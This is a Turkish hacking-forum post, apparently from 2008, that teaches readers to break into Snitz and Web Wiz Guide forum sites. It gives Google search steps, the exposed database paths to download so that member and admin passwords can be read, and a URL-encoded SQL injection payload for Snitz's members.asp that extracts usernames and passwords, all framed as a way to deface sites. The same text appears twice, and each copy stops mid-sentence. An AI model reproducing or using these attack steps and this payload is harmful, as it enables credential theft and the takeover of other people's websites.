hacker_eren
04-30-2008, 06:15 PM
slm arkadaşlar eğer web hackeri olmak istiyorsanız böyle uzun yazıları okuyun we öğrenin şimdi sıra anlatımda ve işte hacker eren farkıyla
çııÖÖçşıÜüforum sitelerinin hacklenmesiii
Bu olayı herkez yapabilir çok basit bir yöntem, bu yöntemle geçen haftalarda 40\'a yakın üyesi olan bir forum u hackledim. En çok kullanılan 2 forum türü vardır biri Snitz diğeri ise Web Wiz Guide forum larıdır. Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. (Sitedeki Linkleri Sadece Üyelerimiz Görebilir..) dan bu isimleri aratıyorsunuz orda size yüzlerce forum çıkar (Web Wiz forum olarak aratın) örneğin Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. (Sitedeki Linkleri Sadece Üyelerimiz Görebilir..) adresinin google dan buldunuz ve siteye girdiniz eğer Snitz forum ise sonuna şunları ekleyin /snitz_forums_2000.mdb daha sonra karşınıza bu dosyayı yüklemek istiyormusunuz diye bişey gelicek kaydet diyin ye dosyayı yükleyin. Daha sonra bilgisayarınızda Microsoft Access varsa bu dosyayı açıp o forum un bütün şifrelerinin ele geçirebilirsiniz. Geçirdiğiniz şifreler arasında admin şifreside bulunmaktadır bu sayede forum un ortasına hacked by .... yaza bilirsiniz. Yanlız bu olay bütün forumlarda olmamaktadır.
1-Google dan Sntiz forum diye arattığınız sitelerin sonuna \"/snitz_forums_2000.mdb\" yi ekleyin örneğin Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. (Sitedeki Linkleri Sadece Üyelerimiz Görebilir..)
2-Google dan Web Wiz Guide forum diye aratığınız istelerin sonuna \"/admin/wwForum.mdb\" yi ekleyin örneğin Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. (Sitedeki Linkleri Sadece Üyelerimiz Görebilir..)
Arkadaşlar bildiğiniz gibi bazı snitz forumlarının açığı var:
1)kendimize snitz kullanan bir site buluyoruz: Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. .com/forum/
2)O forumun bulunduğu bölüme şu kodları ekliyoruz:
members.asp?mode=search& M_NAME=Ace%25\')%
20UNION%20SELECT%20MEMBER_ID,%
20M_STATUS,%20M_NAME%20%2B%20 \'/\'%20%
2B%20M_PASSWORD%20%2B%20\'/ \',%20M_LEVEL,%20M_EMAIL,%20M_COUNTRY,%
20M_HOMEPAGE,%20M_ICQ,%20M_YAHOO,%20M _AIM,%20M_TITLE,%20M_POSTS,%20M_LASTPOSTDATE,%20M_ LASTHEREDA TE,%
20M_DATE,%2 0M_STATE%20FROM%
20FORUM_MEMBERS%20WHERE%20(M_NAME%
20LIKE%20\'&initial=1&method=
3)Kullanıcı Adları&Şifre olarak karşımıza çıkıyor.
Not:Bu açık eskiden beri oldugu için bazı siteler
çııÖÖçşıÜüforum sitelerinin hacklenmesiii
Bu olayı herkez yapabilir çok basit bir yöntem, bu yöntemle geçen haftalarda 40\'a yakın üyesi olan bir forum u hackledim. En çok kullanılan 2 forum türü vardır biri Snitz diğeri ise Web Wiz Guide forum larıdır. Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. (Sitedeki Linkleri Sadece Üyelerimiz Görebilir..) dan bu isimleri aratıyorsunuz orda size yüzlerce forum çıkar (Web Wiz forum olarak aratın) örneğin Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. (Sitedeki Linkleri Sadece Üyelerimiz Görebilir..) adresinin google dan buldunuz ve siteye girdiniz eğer Snitz forum ise sonuna şunları ekleyin /snitz_forums_2000.mdb daha sonra karşınıza bu dosyayı yüklemek istiyormusunuz diye bişey gelicek kaydet diyin ye dosyayı yükleyin. Daha sonra bilgisayarınızda Microsoft Access varsa bu dosyayı açıp o forum un bütün şifrelerinin ele geçirebilirsiniz. Geçirdiğiniz şifreler arasında admin şifreside bulunmaktadır bu sayede forum un ortasına hacked by .... yaza bilirsiniz. Yanlız bu olay bütün forumlarda olmamaktadır.
1-Google dan Sntiz forum diye arattığınız sitelerin sonuna \"/snitz_forums_2000.mdb\" yi ekleyin örneğin Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. (Sitedeki Linkleri Sadece Üyelerimiz Görebilir..)
2-Google dan Web Wiz Guide forum diye aratığınız istelerin sonuna \"/admin/wwForum.mdb\" yi ekleyin örneğin Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. (Sitedeki Linkleri Sadece Üyelerimiz Görebilir..)
Arkadaşlar bildiğiniz gibi bazı snitz forumlarının açığı var:
1)kendimize snitz kullanan bir site buluyoruz: Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. .com/forum/
2)O forumun bulunduğu bölüme şu kodları ekliyoruz:
members.asp?mode=search& M_NAME=Ace%25\')%
20UNION%20SELECT%20MEMBER_ID,%
20M_STATUS,%20M_NAME%20%2B%20 \'/\'%20%
2B%20M_PASSWORD%20%2B%20\'/ \',%20M_LEVEL,%20M_EMAIL,%20M_COUNTRY,%
20M_HOMEPAGE,%20M_ICQ,%20M_YAHOO,%20M _AIM,%20M_TITLE,%20M_POSTS,%20M_LASTPOSTDATE,%20M_ LASTHEREDA TE,%
20M_DATE,%2 0M_STATE%20FROM%
20FORUM_MEMBERS%20WHERE%20(M_NAME%
20LIKE%20\'&initial=1&method=
3)Kullanıcı Adları&Şifre olarak karşımıza çıkıyor.
Not:Bu açık eskiden beri oldugu için bazı siteler